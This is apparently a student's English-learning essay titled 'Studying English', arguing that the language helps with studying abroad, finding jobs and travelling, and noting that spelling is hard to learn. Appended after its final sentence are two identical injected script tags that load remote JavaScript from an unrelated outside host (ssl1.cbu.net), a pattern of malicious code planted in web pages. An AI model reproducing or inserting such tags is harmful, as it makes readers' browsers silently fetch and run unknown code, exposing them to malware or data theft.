Studying English

Nowadays it is a well known fact that studying English is very important in our life. English is a language that is spoken around the world. So, the more significant question is: Why should anyone want to study English? Well, there are some very good reasons for that.

First and foremost, the knowledge of English will help you a lot when you further studies. On the one hand, if you want to study abroad, this language is essential to many countries. English language also helps gratly in your job as well as speaking and understand English can let you find more job opportunities not only in my or another county. Furthermore, it will help a lot when you travel so that you can communicate and explore places.

On the other hand, in spite of studying English has much positive aspect you should know is difficult to learn for the simple reason that spelling in English is a matter of memorization owing to various words that sound one way and are spelled another. Apart from this, there are many words that have the some or almost the same meaning.

In conclusion, personal speaking, I consider that studying English is vere necessaryto me due to I will study abroad at an university in Canada. Thus, as I see it, if had not known English, I would not have get the sport grant. What is more I would not have the chance to live abroad.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>